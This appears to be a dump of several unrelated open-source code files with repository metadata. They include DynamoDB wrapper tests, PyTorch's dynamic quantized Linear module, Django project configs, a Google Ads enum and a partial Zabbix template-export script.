    def test_add_dicts_base_case(self):
        """ add_dict where one argument is None returns the other """
        f = object()
        self.assertEqual(add_dicts(f, None), f)
        self.assertEqual(add_dicts(None, f), f)

    def test_add_dicts(self):
        """ Merge two dicts of values together """
        # Shared keys are summed, not overwritten.
        a = {
            'a': 1,
            'b': 2,
        }
        b = {
            'a': 3,
            'c': 4,
        }
        ret = add_dicts(a, b)
        self.assertEqual(ret, {
            'a': 4,
            'b': 2,
            'c': 4,
        })

    def test_count_repr(self):
        """ Count repr """
        count = Count(0, 0)
        self.assertEqual(repr(count), "Count(0)")

    def test_count_addition(self):
        """ Count addition """
        count = Count(4, 2)
        self.assertEqual(count + 5, 9)

    def test_count_subtraction(self):
        """ Count subtraction """
        count = Count(4, 2)
        self.assertEqual(count - 2, 2)

    def test_count_multiplication(self):
        """ Count multiplication """
        count = Count(4, 2)
        self.assertEqual(2 * count, 8)

    def test_count_division(self):
        """ Count division """
        count = Count(4, 2)
        self.assertEqual(count / 2, 2)

    def test_count_add_none_capacity(self):
        """ Count addition with one None consumed_capacity """
        # Only one operand carries capacity; the sum must keep it.
        cap = Capacity.create_read({'CapacityUnits': 3})
        count = Count(4, 2)
        count2 = Count(5, 3, cap)
        ret = count + count2
        self.assertEqual(ret, 9)
        self.assertEqual(ret.scanned_count, 5)
        self.assertEqual(ret.consumed_capacity, cap)

    def test_count_add_capacity(self):
        """ Count addition with consumed_capacity """
        count = Count(4, 2, Capacity.create_read({'CapacityUnits': 3}))
        count2 = Count(5, 3, Capacity.create_read({'CapacityUnits': 2}))
        ret = count + count2
        self.assertEqual(ret, 9)
        self.assertEqual(ret.scanned_count, 5)
        self.assertEqual(ret.consumed_capacity.read, 5)

    def test_capacity_factories(self):
        """ Capacity.create_(read|write) factories """
        cap = Capacity.create_read({'CapacityUnits': 3})
        self.assertEqual(cap.read, 3)
        self.assertEqual(cap.write, 0)
        cap = Capacity.create_write({'CapacityUnits': 3})
        self.assertEqual(cap.write, 3)
        self.assertEqual(cap.read, 0)

    def test_capacity_math(self):
        """ Capacity addition and equality """
        cap = Capacity(2, 4)
        # Membership in a set exercises __hash__ together with __eq__.
        s = set([cap])
        self.assertIn(Capacity(2, 4), s)
        self.assertNotEqual(Capacity(1, 4), cap)
        self.assertEqual(Capacity(1, 1) + Capacity(2, 2), Capacity(3, 3))

    def test_capacity_format(self):
        """ String formatting for Capacity """
        c = Capacity(1, 3)
        self.assertEqual(str(c), "R:1.0 W:3.0")
        c = Capacity(0, 0)
        self.assertEqual(str(c), "0")

    def test_total_consumed_capacity(self):
        """ ConsumedCapacity can parse results with only Total """
        response = {
            'TableName': 'foobar',
            'CapacityUnits': 4,
        }
        cap = ConsumedCapacity.from_response(response, True)
        self.assertEqual(cap.total.read, 4)
        self.assertIsNone(cap.table_capacity)

    def test_consumed_capacity_equality(self):
        """ ConsumedCapacity addition and equality """
        # Args: table, total, table_capacity, local indexes, global indexes.
        cap = ConsumedCapacity('foobar', Capacity(0, 10), Capacity(0, 2), {
            'l-index': Capacity(0, 4),
        }, {
            'g-index': Capacity(0, 3),
        })
        c2 = ConsumedCapacity('foobar', Capacity(0, 10), Capacity(0, 2), {
            'l-index': Capacity(0, 4),
            'l-index2': Capacity(0, 7),
        })
        self.assertNotEqual(cap, c2)
        c3 = ConsumedCapacity('foobar', Capacity(0, 10), Capacity(0, 2), {
            'l-index': Capacity(0, 4),
        }, {
            'g-index': Capacity(0, 3),
        })
        self.assertIn(cap, set([c3]))
        combined = cap + c2
        self.assertEqual(
            cap + c2,
            ConsumedCapacity('foobar', Capacity(0, 20), Capacity(0, 4),
                             {'l-index': Capacity(0, 8), 'l-index2': Capacity(0, 7), },
                             {'g-index': Capacity(0, 3), }))
        self.assertIn(str(Capacity(0, 3)), str(combined))

    def test_add_different_tables(self):
        """ Cannot add ConsumedCapacity of two different tables """
        c1 = ConsumedCapacity('foobar', Capacity(1, 28))
        c2 = ConsumedCapacity('boofar', Capacity(3, 0))
        with self.assertRaises(TypeError):
            c1 += c2

    def test_always_continue_query(self):
        """ Regression test.
        If result has no items but does have LastEvaluatedKey, keep querying.
        """
        conn = MagicMock()
        conn.dynamizer.decode_keys.side_effect = lambda x: x
        items = ['a', 'b']
        # Two empty pages that still carry a LastEvaluatedKey, then data.
        results = [
            {'Items': [], 'LastEvaluatedKey': {'foo': 1, 'bar': 2}},
            {'Items': [], 'LastEvaluatedKey': {'foo': 1, 'bar': 2}},
            {'Items': items},
        ]
        conn.call.side_effect = lambda *_, **__: results.pop(0)
        rs = ResultSet(conn, Limit())
        results = list(rs)
        self.assertEqual(results, items)
class TestHooks(BaseSystemTest):
    """ Tests for connection callback hooks """

    def tearDown(self):
        super(TestHooks, self).tearDown()
        # Drain every hook list in place so hooks never leak across tests.
        for hooks in six.itervalues(self.dynamo._hooks):
            while hooks:
                hooks.pop()

    def test_precall(self):
        """ precall hooks are called before an API call """
        hook = MagicMock()
        self.dynamo.subscribe('precall', hook)
        def throw(**_):
            """ Throw an exception to terminate the request """
            raise Exception()
        with patch.object(self.dynamo, 'client') as client:
            client.describe_table.side_effect = throw
            with self.assertRaises(Exception):
                self.dynamo.describe_table('foobar')
            # The hook must have fired even though the call itself failed.
            hook.assert_called_with(
                self.dynamo, 'describe_table', {
                    'TableName': 'foobar'})

    def test_postcall(self):
        """ postcall hooks are called after API call """
        hash_key = DynamoKey('id')
        self.dynamo.create_table('foobar', hash_key=hash_key)
        calls = []
        def hook(*args):
            """ Log the call into a list """
            calls.append(args)
        self.dynamo.subscribe('postcall', hook)
        self.dynamo.describe_table('foobar')
        self.assertEqual(len(calls), 1)
        args = calls[0]
        # Postcall signature: (connection, command, kwargs, response).
        self.assertEqual(len(args), 4)
        conn, command, kwargs, response = args
        self.assertEqual(conn, self.dynamo)
        self.assertEqual(command, 'describe_table')
        self.assertEqual(kwargs['TableName'], 'foobar')
        self.assertEqual(response['Table']['TableName'], 'foobar')

    def test_capacity(self):
        """ capacity hooks are called whenever response has ConsumedCapacity """
        hash_key = DynamoKey('id')
        self.dynamo.create_table('foobar', hash_key=hash_key)
        hook = MagicMock()
        self.dynamo.subscribe('capacity', hook)
        with patch.object(self.dynamo, 'client') as client:
            client.scan.return_value = {
                'Items': [],
                'ConsumedCapacity': {
                    'TableName': 'foobar',
                    'CapacityUnits': 4,
                }
            }
            rs = self.dynamo.scan('foobar')
            # Consume the lazy result set so the scan call actually runs.
            list(rs)
        cap = ConsumedCapacity('foobar', Capacity(4, 0))
        hook.assert_called_with(self.dynamo, 'scan', ANY, ANY, cap)

    def test_subscribe(self):
        """ Can subscribe and unsubscribe from hooks """
        hook = object()
        self.dynamo.subscribe('precall', hook)
        self.assertEqual(len(self.dynamo._hooks['precall']), 1)
        self.dynamo.unsubscribe('precall', hook)
        self.assertEqual(len(self.dynamo._hooks['precall']), 0)
|
[
"stevearc@stevearc.com"
] |
stevearc@stevearc.com
|
1cb4aefd9a5b1077a5c844f51cf26e0e25ef605b
|
f6761bd4b74ed9c3bc0e8f62e5a1db70c03096f0
|
/torch/nn/quantized/dynamic/modules/linear.py
|
7574dd53eb761570aa1b6445bc8593eba60de6c2
|
[
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
MarisaKirisame/pytorch
|
b638790a0997d776ad4c5e4c77badc77e5dc94f9
|
59c5de4d0eda8d4f5494602034093933600d0a3d
|
refs/heads/master
| 2021-06-19T10:44:33.846286
| 2019-10-31T22:56:55
| 2019-10-31T22:58:28
| 218,881,408
| 2
| 0
|
NOASSERTION
| 2019-11-01T00:02:51
| 2019-11-01T00:02:51
| null |
UTF-8
|
Python
| false
| false
| 3,423
|
py
|
from __future__ import absolute_import, division, print_function, unicode_literals
import torch
from ....modules.linear import Linear as NNLinear
import torch.nn.quantized as nnq
class Linear(nnq.Linear):
    r"""
    A dynamic quantized linear module with quantized tensor as inputs and outputs.
    We adopt the same interface as `torch.nn.Linear`, please see
    https://pytorch.org/docs/stable/nn.html#torch.nn.Linear for documentation.
    Similar to :class:`torch.nn.Linear`, attributes will be randomly
    initialized at module creation time and will be overwritten later
    Attributes:
        weight (Tensor): the non-learnable quantized weights of the module which are of
            shape :math:`(\text{out\_features}, \text{in\_features})`.
        bias (Tensor): the non-learnable bias of the module of shape :math:`(\text{out\_features})`.
            If :attr:`bias` is ``True``, the values are initialized to zero.
    Examples::
        >>> m = nn.quantized.dynamic.Linear(20, 30)
        >>> input = torch.randn(128, 20)
        >>> output = m(input)
        >>> print(output.size())
        torch.Size([128, 30])
    """
    def __init__(self, in_features, out_features, bias_=True):
        super(Linear, self).__init__(in_features, out_features, bias_)
        # We don't muck around with buffers or attributes or anything here
        # to keep the module simple. *everything* is simply a Python attribute.
        # Serialization logic is explicitly handled in the below serialization and
        # deserialization modules
    def forward(self, x):
        # Note that we can handle self.bias == None case.
        # NOTE(review): input quantization is presumably handled inside the
        # linear_dynamic op using the prepacked params -- confirm against
        # the op's documentation.
        Y = torch.ops.quantized.linear_dynamic(
            x, self._packed_params)
        # Cast the result back to the (float) dtype of the input.
        return Y.to(x.dtype)
    def _get_name(self):
        # Name used by Module.__repr__ in place of the class name.
        return 'DynamicQuantizedLinear'
    def extra_repr(self):
        # Shown inside the module's repr, mirroring nn.Linear's format.
        return 'in_features={}, out_features={}'.format(
            self.in_features, self.out_features
        )
    @classmethod
    def from_float(cls, mod):
        r"""Create a dynamic quantized module from a float module or qparams_dict
        Args:
            mod (Module): a float module, either produced by torch.quantization
                          utilities or provided by the user
        """
        assert type(mod) == NNLinear, 'nn.quantized.dynamic.Linear.from_float only works for nn.Linear'
        assert hasattr(mod, 'qconfig'), 'Input float module must have qconfig defined'
        if mod.qconfig is not None and mod.qconfig.weight is not None:
            weight_observer = mod.qconfig.weight()
        else:
            # We have the circular import issues if we import the qconfig in the beginning of this file:
            # https://github.com/pytorch/pytorch/pull/24231. The current workaround is to postpone the
            # import until we need it.
            from torch.quantization.qconfig import default_dynamic_qconfig
            weight_observer = default_dynamic_qconfig.weight()
        assert weight_observer.dtype == torch.qint8, 'Weight observer must have dtype torch.qint8'
        # Observe the float weight to derive per-tensor scale/zero-point,
        # then quantize the weight to qint8.
        weight_observer(mod.weight)
        wt_scale, wt_zp = weight_observer.calculate_qparams()
        qweight = torch.quantize_per_tensor(mod.weight.float(), float(wt_scale), int(wt_zp), torch.qint8)
        # Constructed with the default bias flag; set_weight_bias installs
        # the real (possibly None) float bias from the source module.
        qlinear = Linear(mod.in_features, mod.out_features)
        qlinear.set_weight_bias(qweight, mod.bias)
        return qlinear
|
[
"facebook-github-bot@users.noreply.github.com"
] |
facebook-github-bot@users.noreply.github.com
|
c4f1e1e1f8733b767ee1c04540805b7abc0a0d9b
|
5329cfea55404d9bbff223d761f06e2ec27c1ab7
|
/djangonautic/manage.py
|
6b1f7568039bef8fb496997b55bbbb4df8431254
|
[] |
no_license
|
rohit1717/articles-django-
|
c2d6fe202d62b1c3b56bec25f896fced23247f53
|
669e7186cc1b26b70f87ee8c4b782d0743c5bd8a
|
refs/heads/master
| 2022-12-02T21:44:50.231428
| 2020-08-20T17:54:22
| 2020-08-20T17:54:22
| 289,074,266
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 809
|
py
|
#!/usr/bin/env python
import os
import sys


def _main():
    """Point Django at this project's settings and run the CLI."""
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "djangoautic.settings")
    try:
        from django.core.management import execute_from_command_line
    except ImportError:
        # Distinguish "Django is missing" from any other import failure so
        # the real error is not masked on Python 2.
        try:
            import django  # noqa: F401
        except ImportError:
            raise ImportError(
                "Couldn't import Django. Are you sure it's installed and "
                "available on your PYTHONPATH environment variable? Did you "
                "forget to activate a virtual environment?"
            )
        raise
    execute_from_command_line(sys.argv)


if __name__ == "__main__":
    _main()
|
[
"rohitsingh17172000@gmail.com"
] |
rohitsingh17172000@gmail.com
|
90b90c1af562cd40a9888489a3719f6af2d1acba
|
eaad714626b105134a8b6d4d6e316a6aab1e436a
|
/prayas/prayas/urls.py
|
ff37d21e139ea46ca9594cf2875e381e45598a70
|
[] |
no_license
|
pradeeppc/Elearning-Web-App
|
967070e130249423b98111de62269ea8e4fd2312
|
49aeb430b5fecccd49d2a9e9332fcd8f138662a4
|
refs/heads/master
| 2023-03-21T15:28:52.565546
| 2021-03-13T15:16:24
| 2021-03-13T15:16:24
| 149,626,491
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,359
|
py
|
"""prayas URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
from django.contrib.auth import views as auth_views
from courses.views import CourseListView
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('accounts/login/', auth_views.LoginView.as_view(), name='login'),
path('accounts/logout/', auth_views.LogoutView.as_view(), name='logout'),
path('admin/', admin.site.urls),
path('course/', include('courses.urls')),
path('', CourseListView.as_view(), name='course_list'),
path('students/', include('students.urls')),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
|
[
"pradeeep765@gmail.com"
] |
pradeeep765@gmail.com
|
094f154dc9007753efa071553ad662baa9cb66f4
|
9ae6ce54bf9a2a86201961fdbd5e7b0ec913ff56
|
/google/ads/googleads/v10/enums/types/matching_function_operator.py
|
11a366438b14b5a9625600a5fa27c1e72a1abe49
|
[
"Apache-2.0"
] |
permissive
|
GerhardusM/google-ads-python
|
73b275a06e5401e6b951a6cd99af98c247e34aa3
|
676ac5fcb5bec0d9b5897f4c950049dac5647555
|
refs/heads/master
| 2022-07-06T19:05:50.932553
| 2022-06-17T20:41:17
| 2022-06-17T20:41:17
| 207,535,443
| 0
| 0
|
Apache-2.0
| 2019-09-10T10:58:55
| 2019-09-10T10:58:55
| null |
UTF-8
|
Python
| false
| false
| 1,228
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE(review): this module appears to be auto-generated from the Google
# Ads API v10 protos -- prefer regenerating over hand-editing.
import proto  # type: ignore
# Registers this module's messages with the proto-plus marshal for the
# google.ads.googleads.v10 package.
__protobuf__ = proto.module(
    package="google.ads.googleads.v10.enums",
    marshal="google.ads.googleads.v10",
    manifest={
        "MatchingFunctionOperatorEnum",
    },
)
class MatchingFunctionOperatorEnum(proto.Message):
    r"""Container for enum describing matching function operator."""
    class MatchingFunctionOperator(proto.Enum):
        r"""Possible operators in a matching function."""
        UNSPECIFIED = 0
        UNKNOWN = 1
        IN = 2
        IDENTITY = 3
        EQUALS = 4
        AND = 5
        CONTAINS_ANY = 6
# Public API of this module, derived from the proto manifest above.
__all__ = tuple(sorted(__protobuf__.manifest))
|
[
"noreply@github.com"
] |
GerhardusM.noreply@github.com
|
8677a029b2db44ceafb04e7963b4cf60db2cacb9
|
532fdd01a9080d9980c18a68789b45b207e68550
|
/aaltomood/urls.py
|
ff8e5a84280efce7778b11e53cf5e51f08288ade
|
[] |
no_license
|
tonipel/aaltomood
|
3b85fe73b2b7bdf7eabcb591db33da276506871c
|
3ef2fb7ee65a166d1c6e7960b6f492dab951625e
|
refs/heads/master
| 2023-01-05T19:26:23.083041
| 2020-11-07T22:06:14
| 2020-11-07T22:06:14
| 310,659,482
| 0
| 0
| null | 2020-11-07T11:47:03
| 2020-11-06T17:12:37
|
Python
|
UTF-8
|
Python
| false
| false
| 913
|
py
|
"""aaltomood URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include, path
from django.contrib.auth import views as auth_views
urlpatterns = [
path('mood/', include('mood.urls')),
path('admin/', admin.site.urls),
path('accounts/', include('django.contrib.auth.urls')),
]
|
[
"toni.pellinen@hotmail.com"
] |
toni.pellinen@hotmail.com
|
acd099225a02f96c7d3c8ff511a976350a843ec3
|
55610cce405fd4f2809bd7d26b4f19b9c2b1d3cd
|
/make_up/migrations/0002_makeuptask_student.py
|
718d9dd7a33b84b0bdd3e99ef57ad00ce51b2c8a
|
[] |
no_license
|
zzzzty/jtdx
|
30d648cf06f259dfb55227a1fb64b74a24afdd85
|
4486d9073416b7df8b93ac47d1b29256a4dff260
|
refs/heads/master
| 2020-06-07T14:02:02.074749
| 2019-12-26T07:46:40
| 2019-12-26T07:46:40
| 193,014,124
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 525
|
py
|
# Generated by Django 2.2.2 on 2019-07-06 07:34
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Add an optional ForeignKey from MakeUpTask to Student."""
    # Requires the student app's nick_name migration and this app's
    # initial schema.
    dependencies = [
        ('student', '0002_student_nick_name'),
        ('make_up', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='makeuptask',
            name='student',
            # null=True lets existing rows migrate without a value;
            # DO_NOTHING means Django takes no action when the referenced
            # Student is deleted.
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='student.Student'),
        ),
    ]
|
[
"zzzliusong@163.com"
] |
zzzliusong@163.com
|
13feaddae7e89a0fa743ed4afd4a49c1ec6a1f26
|
1701f11946debbca91708f5bb69c494cfbb4fb7a
|
/benwillkommen/benwillkommen/settings.py
|
2f2127bf772da4463f293c31c43a29727963d930
|
[] |
no_license
|
benwillkommen/benwillkommen.com
|
4b3f8515c83a51e13023a402dd79d4759baee3b9
|
b00041d67f910435cc8b9f5d364e1e282cee9775
|
refs/heads/master
| 2020-05-18T18:01:54.760330
| 2014-03-16T03:20:44
| 2014-03-16T03:20:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,549
|
py
|
# Django settings for benwillkommen project.
#modification for playing w/ git
# NOTE(review): DEBUG is enabled -- must be False in production, at which
# point ALLOWED_HOSTS below has to be populated.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
    # ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql_psycopg2', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
        'NAME': 'benwillkommen', # Or path to database file if using sqlite3.
        # The following settings are not used with sqlite3:
        'USER': '',
        'PASSWORD': '',
        'HOST': 'localhost', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
        'PORT': '', # Set to empty string for default.
        # NOTE(review): per-database TIME_ZONE option -- confirm this is
        # intended in addition to the global TIME_ZONE below.
        'TIME_ZONE': 'US/Central'
    }
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'US/Central'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = False
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
    # Put strings here, like "/home/html/static" or "C:/www/django/static".
    # Always use forward slashes, even on Windows.
    # Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder',
    # 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
# NOTE(review): the secret key is committed to source control -- rotate it
# and load it from an environment variable instead.
SECRET_KEY = 'j36b4t9$fx#^qmy8nx$*219vsbnp%dp+9yoj3^*#td$^3!i!ah'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
    'django.template.loaders.filesystem.Loader',
    'django.template.loaders.app_directories.Loader',
    # 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
    'django.middleware.common.CommonMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    # Uncomment the next line for simple clickjacking protection:
    # 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'benwillkommen.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'benwillkommen.wsgi.application'
TEMPLATE_DIRS = (
    # Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
    # Always use forward slashes, even on Windows.
    # Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.sites',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    # Uncomment the next line to enable the admin:
    # 'django.contrib.admin',
    # Uncomment the next line to enable admin documentation:
    # 'django.contrib.admindocs',
)
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'filters': {
        'require_debug_false': {
            '()': 'django.utils.log.RequireDebugFalse'
        }
    },
    'handlers': {
        'mail_admins': {
            'level': 'ERROR',
            'filters': ['require_debug_false'],
            'class': 'django.utils.log.AdminEmailHandler'
        }
    },
    'loggers': {
        'django.request': {
            'handlers': ['mail_admins'],
            'level': 'ERROR',
            'propagate': True,
        },
    }
}
|
[
"benwillkommen@gmail.com"
] |
benwillkommen@gmail.com
|
e9734d05b7e16399760fe649e8c74a4afdef02c4
|
c8b5d05ff16d422ec05addb99f208467f01fa373
|
/tests/Character_tests.py
|
c1133329199065c0a91a490c00f3c6fc7b34fcab
|
[] |
no_license
|
PreslavaKuzova/Dungeons-And-Pythons
|
298105ba51ef4a10e35461c3fcef5818d0934b53
|
5629e63a09a34e5e820383da0509cb67147ec19d
|
refs/heads/master
| 2020-05-07T11:05:20.120814
| 2019-04-15T14:37:42
| 2019-04-15T14:37:42
| 180,445,498
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,138
|
py
|
import unittest
import os, sys
sys.path.insert(0, '../')
from Character import *
class HeroTests(unittest.TestCase):
    """Behavioural tests for Character health tracking and liveness."""

    def test_init_value(self):
        character = Character(20)
        self.assertEqual(character.get_health(), 20)

    def test_when_damage_is_taken_and_substract_that_much_from_the_health(self):
        character = Character(100)
        character.take_damage(20)
        self.assertEqual(character.get_health(), 80)

    def test_when_damage_taken_is_more_that_the_health_then_health_equals_zero(self):
        # Health is clamped at zero instead of going negative.
        character = Character(50)
        character.take_damage(60)
        self.assertEqual(character.get_health(), 0)

    def test_when_damage_taken_is_more_that_the_health_then_character_is_dead(self):
        character = Character(50)
        character.take_damage(60)
        self.assertFalse(character.is_alive())

    def test_when_damage_taken_is_less_that_the_health_then_character_is_dead(self):
        # Survives because some health remains after the hit.
        character = Character(60)
        character.take_damage(50)
        self.assertTrue(character.is_alive())

    def test_when_starting_with_no_health_and_test_whether_it_is_alive(self):
        self.assertFalse(Character(0).is_alive())
if __name__ == '__main__':
    # Run the test suite when invoked directly.
    unittest.main()
|
[
"preslava.kuzova@gmail.com"
] |
preslava.kuzova@gmail.com
|
cdd78006ece1d3fe85d569ed5cd2713d6c9d3dc0
|
b5abb217826b531c8f4c24c74df5620cf89234e0
|
/tutorial/quickstart/views/wavsViews.py
|
96d52c59b977477927374207b08abe16e53cc95d
|
[] |
no_license
|
zhwj2015/speech
|
bedf80c2842b3c344cd1932ba22b71ecaddb84dc
|
5155a45b088acaca6988e910927197e2da71f556
|
refs/heads/master
| 2016-09-06T09:53:05.564149
| 2015-07-08T00:14:27
| 2015-07-08T00:14:27
| 37,200,594
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,167
|
py
|
__author__ = 'Administor'
from rest_framework import viewsets
from tutorial.quickstart.models import Wavs, Users
from tutorial.quickstart.serializers import WavsSerializer
from rest_framework.response import Response
import os
from rest_framework.renderers import JSONRenderer
from django.utils.six import BytesIO
from rest_framework.parsers import JSONParser
from tutorial.quickstart.util import Util, JSONResponse
class WavsViews(viewsets.ModelViewSet):
    # DRF ModelViewSet exposing CRUD endpoints for Wavs records.
    queryset = Wavs.objects.all()
    serializer_class = WavsSerializer
    def create(self, request, *args, **kwargs):
        # Upload handler for wav files.
        # NOTE(review): the whole upload/save pipeline below is commented
        # out, so this endpoint currently always answers {'status': True}
        # without persisting anything.
        try:
            pass
            # filename = request.data['wavs'].name
            # suffix=filename[filename.find('.'):]
            # name = Util.getTimestamp()
            # filename = str(name)+str(suffix)
            # path = 'wavs/'+filename
            # user_id = request.data['uid']
            # user = Users.objects.all().get(user_id=user_id)
            # created = request.data['created']
            # created = Util.strToTime(created,'%Y-%m-%d')
            #
            # if not os.path.exists('wavs/'):
            #     os.makedirs('wavs/')
            # out = open(path, 'wb+')
            # infile = request.data['wavs']
            # for chunk in infile.chunks():
            #     out.write(chunk)
            # out.flush()
            # out.close()
            # wav = Wavs(wav_id=name, name=filename, path=path, user_id=user, created=created, score=0)
            # serializer = WavsSerializer(wav)
            # json = JSONRenderer().render(serializer.data)
            # stream = BytesIO(json)
            # data = JSONParser().parse(stream)
            # serializer = WavsSerializer(data=data)
            # #object to JSON
            # # data = Util.serializeToJSON(serializer)
            # #
            # # serializer = WavsSerializer(data=data)
            # if serializer.is_valid():
            #     wav.save()
            # else:
            #     return JSONResponse({'status': False})
        except Exception, e:
            # Python 2 exception syntax; any failure maps to status False.
            print "error"
            return JSONResponse({'status': False})
        return JSONResponse({'status': True})
|
[
"1654339276@qq.com"
] |
1654339276@qq.com
|
363ece98f426ed769e0ca2315c020c8c4b8a79e2
|
8a18444ba20243cc0d1318efc2c06fbe3c8fbdba
|
/All_Template_Export/All_Templates_Export.py
|
1a54ddb853f88909850fda054c7c5fd77f2f731f
|
[] |
no_license
|
Aqumik/Zabbix-API
|
9157676b03b62e79a22f6c5161a9063137a0fac2
|
6670d58a871a7dc3f3f9dbfe443eff74cce14af9
|
refs/heads/main
| 2023-02-28T21:45:16.430836
| 2021-01-29T08:20:16
| 2021-01-29T08:20:16
| 334,079,762
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,445
|
py
|
# -*- coding:UTF-8 -*-
# @aqumik 2021-1-29 Python3 导出Zabbix所有模板,虽然xml格式有点难看,但是直接导入到服务器就可使用!!
# 具体参数可以查看注释,SSL直接使用了False
import json
import requests
class Zabbix(object):
    """Thin wrapper around the Zabbix JSON-RPC API: login/logout, template
    listing, and per-template XML export (SSL verification is disabled)."""
    def __init__(self,url,header,user,password):
        self.url = url
        self.header = header
        self.id = 0
        self.user = user
        self.password = password
    # def get_auth(self):
    #     req = json.dumps(
    #         {
    #             "jsonrpc": "2.0",
    #             "method": "user.login",
    #             "params": {
    #                 "user": "Admin",
    #                 "password": "zabbix"
    #             },
    #             "id": 0
    #         }
    #     )
    #     ret = requests.post(url=self.url, data=req, headers=self.header).json()
    #     ret = ret['result']
    #     authid = ret
    #     print(authid)
    # Request builder: every JSON-RPC payload submitted to Zabbix is
    # assembled here.
    # NOTE(review): `params={}` is a mutable default argument; it is never
    # mutated in this method, but `params=None` would be safer.
    def json_obj(self,method,auth=True,params={}):
        obj = {
            "jsonrpc": "2.0",
            "method": method,
            "params": params,
            'auth':auth,
            "id":self.id
        }
        # user.login must be sent without an auth field, so it is removed
        # here, before the payload is serialized to JSON.
        if not auth:
            del obj["auth"]
        obj = json.dumps(obj)
        return obj
